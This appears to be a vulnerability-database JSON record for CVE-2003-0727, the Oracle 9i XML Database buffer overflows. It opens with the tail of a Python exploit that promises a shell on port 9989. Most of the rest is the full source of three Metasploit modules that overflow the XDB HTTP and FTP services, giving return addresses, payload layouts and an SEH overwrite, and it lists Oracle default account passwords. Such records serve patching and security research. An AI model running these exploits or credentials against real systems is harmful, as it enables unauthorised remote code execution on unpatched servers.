\"\\r\\n\\r\\n\"\r\n \r\nprint (\"Attacking \" + rhost + \":\" + str(rport))\r\n \r\n#Connect to the target\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect((rhost,rport))\r\n#Send exploit\r\ns.send(request)\r\ns.close()\r\n \r\nprint (\"Try to connect on port 9989.\")\n\n# 0day.today 
[2018-03-02] #", "sourceHref": "https://0day.today/exploit/28634", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "metasploit": [{"lastseen": "2020-07-02T22:48:16", "description": "This module exploits a stack buffer overflow in the authorization code of the Oracle 9i HTTP XDB service. David Litchfield has illustrated multiple vulnerabilities in the Oracle 9i XML Database (XDB) during a seminar on \"Variations in exploit methods between Linux and Windows\" presented at the Blackhat conference.\n", "edition": 2, "cvss3": {}, "published": "2006-10-26T13:17:43", "type": "metasploit", "title": "Oracle 9i XDB HTTP PASS Overflow (win32)", "bulletinFamily": "exploit", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0727"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/HTTP/ORACLE9I_XDB_PASS", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Oracle 9i XDB HTTP PASS Overflow (win32)',\n 'Description' => %q{\n This module exploits a stack buffer overflow in the authorization\n code of the Oracle 9i HTTP XDB service. 
David Litchfield,\n has illustrated multiple vulnerabilities in the Oracle\n 9i XML Database (XDB), during a seminar on \"Variations\n in exploit methods between Linux and Windows\" presented\n at the Blackhat conference.\n },\n 'Author' => [ 'MC' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2003-0727'],\n ['OSVDB', '2449'],\n ['BID', '8375'],\n ['URL', 'http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf'],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Privileged' => true,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\",\n 'PrependEncoder' => \"\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\",\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Oracle 9.2.0.1 Universal', { 'Ret' => 0x60616d46 } ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Aug 18 2003'))\n\n register_options(\n [\n Opt::RPORT(8080)\n ])\n end\n\n def check\n connect\n sock.put(\"GET / HTTP/1.0\\r\\n\\r\\n\")\n resp = sock.get_once\n disconnect\n\n if (resp =~ /9\\.2\\.0\\.1\\.0/)\n return Exploit::CheckCode::Appears\n end\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n connect\n\n sploit = rand_text_english(4, payload_badchars) + \":\"\n sploit << rand_text_english(442, payload_badchars)\n sploit << \"\\xeb\\x64\" + make_nops(2) + [target.ret].pack('V')\n sploit << make_nops(266) + \"\\xeb\\x10\" + make_nops(109) + payload.encoded\n\n req = \"Authorization: Basic #{Rex::Text.encode_base64(sploit)}\\r\\n\\r\\n\"\n\n res = \"GET / HTTP/1.1\\r\\n\" + \"Host: #{rhost}:#{rport}\\r\\n\" + req\n\n print_status(\"Trying target %s...\" % target.name)\n\n sock.put(res)\n\n handler\n disconnect\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/oracle9i_xdb_pass.rb", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-05-23T04:09:32", "description": "By passing an overly long string to the PASS command, a stack based buffer 
overflow occurs. David Litchfield has illustrated multiple vulnerabilities in the Oracle 9i XML Database (XDB) during a seminar on \"Variations in exploit methods between Linux and Windows\" presented at the Blackhat conference.\n", "edition": 2, "cvss3": {}, "published": "2005-11-25T04:11:22", "type": "metasploit", "title": "Oracle 9i XDB FTP PASS Overflow (win32)", "bulletinFamily": "exploit", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0727"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/FTP/ORACLE9I_XDB_FTP_PASS", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Ftp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Oracle 9i XDB FTP PASS Overflow (win32)',\n 'Description' => %q{\n By passing an overly long string to the PASS command, a\n stack based buffer overflow occurs. 
David Litchfield, has\n illustrated multiple vulnerabilities in the Oracle 9i XML\n Database (XDB), during a seminar on \"Variations in exploit\n methods between Linux and Windows\" presented at the Blackhat\n conference.\n },\n 'Author' => [ 'MC' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2003-0727'],\n [ 'OSVDB', '2449'],\n [ 'BID', '8375'],\n [ 'URL', 'http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf'],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Privileged' => true,\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d\\x20\\x22\\x25\\x26\\x27\\x2b\\x2f\\x3a\\x3c\\x3e\\x3f\\x40\",\n 'PrependEncoder' => \"\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\",\n },\n 'Platform' => %w{ win },\n 'Targets' =>\n [\n [\n 'Oracle 9.2.0.1 Universal',\n {\n 'Platform' => 'win',\n 'Ret' => 0x60616d46, # oraclient9.dll (pop/pop/ret)\n },\n ],\n ],\n 'DisclosureDate' => 'Aug 18 2003',\n 'DefaultTarget' => 0))\n\n register_options([Opt::RPORT(2100),])\n deregister_options('FTPUSER', 'FTPPASS')\n end\n\n\n def check\n connect\n disconnect\n if (banner =~ /9\\.2\\.0\\.1\\.0/)\n return Exploit::CheckCode::Appears\n end\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n connect\n\n user = rand_text_alpha_upper(10)\n sploit = rand_text_alpha_upper(442) + Rex::Arch::X86.jmp_short(6)\n sploit << make_nops(2) + [target.ret].pack('V') + payload.encoded\n\n print_status(\"Trying target #{target.name}...\")\n\n send_cmd( ['USER', user], true )\n send_cmd( ['PASS', sploit], false )\n\n handler\n disconnect\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-08-18T01:13:18", "description": "By passing an overly long token to the UNLOCK command, a stack based buffer overflow occurs. 
David Litchfield has illustrated multiple vulnerabilities in the Oracle 9i XML Database (XDB) during a seminar on \"Variations in exploit methods between Linux and Windows\" presented at the Blackhat conference. Oracle9i includes a number of default accounts, including dbsnmp:dbsnmp, scott:tiger, system:manager, and sys:change_on_install.\n", "edition": 2, "cvss3": {}, "published": "2006-01-08T14:27:59", "type": "metasploit", "title": "Oracle 9i XDB FTP UNLOCK Overflow (win32)", "bulletinFamily": "exploit", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0727"], "modified": "2018-08-20T21:05:58", "id": "MSF:EXPLOIT/WINDOWS/FTP/ORACLE9I_XDB_FTP_UNLOCK", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Ftp\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Oracle 9i XDB FTP UNLOCK Overflow (win32)',\n 'Description' => %q{\n By passing an overly long token to the UNLOCK command, a\n stack based buffer overflow occurs. David Litchfield, has\n illustrated multiple vulnerabilities in the Oracle 9i XML\n Database (XDB), during a seminar on \"Variations in exploit\n methods between Linux and Windows\" presented at the Blackhat\n conference. 
Oracle9i includes a number of default accounts,\n including dbsnmp:dbsmp, scott:tiger, system:manager, and\n sys:change_on_install.\n },\n 'Author' => [ 'MC', 'David Litchfield <david[at]ngssoftware.com>' ],\n 'License' => MSF_LICENSE,\n 'Platform' => [ 'win' ],\n 'References' =>\n [\n [ 'CVE', '2003-0727'],\n [ 'OSVDB', '2449'],\n [ 'BID', '8375'],\n [ 'URL', 'http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf'],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Privileged' => true,\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x20\\x0a\\x0d\",\n 'StackAdjustment' => -3500,\n },\n 'Targets' =>\n [\n [\n 'Oracle 9.2.0.1 Universal',\n {\n 'Ret' => 0x60616d46, # oraclient9.dll (pop/pop/ret)\n },\n ],\n ],\n 'DisclosureDate' => 'Aug 18 2003',\n 'DefaultTarget' => 0))\n\n register_options([\n Opt::RPORT(2100),\n OptString.new('FTPUSER', [ true, 'The username to authenticate as', 'DBSNMP']),\n OptString.new('FTPPASS', [ true, 'The password to authenticate with', 'DBSNMP']),\n ])\n end\n\n def check\n connect\n disconnect\n if (banner =~ /9\\.2\\.0\\.1\\.0/)\n return Exploit::CheckCode::Appears\n end\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n c = connect_login\n return if not c\n\n print_status(\"Trying target #{target.name}...\")\n\n buf = rand_text_english(1130, payload_badchars)\n seh = generate_seh_payload(target.ret)\n buf[322, seh.length] = seh\n\n send_cmd( ['UNLOCK', '/', buf] , false )\n\n handler\n disconnect\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}], "cve": [{"lastseen": "2022-03-23T11:43:52", "description": "Multiple buffer overflows in the XML Database (XDB) functionality for Oracle 9i Database Release 2 allow local users to cause a denial of service or hijack user sessions.", "cvss3": {}, "published": 
"2003-10-20T04:00:00", "type": "cve", "title": "CVE-2003-0727", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0727"], "modified": "2017-09-28T01:29:00", "cpe": ["cpe:/a:oracle:database_server:*"], "id": "CVE-2003-0727", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0727", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:oracle:database_server:*:*:*:*:*:*:*:*"]}]}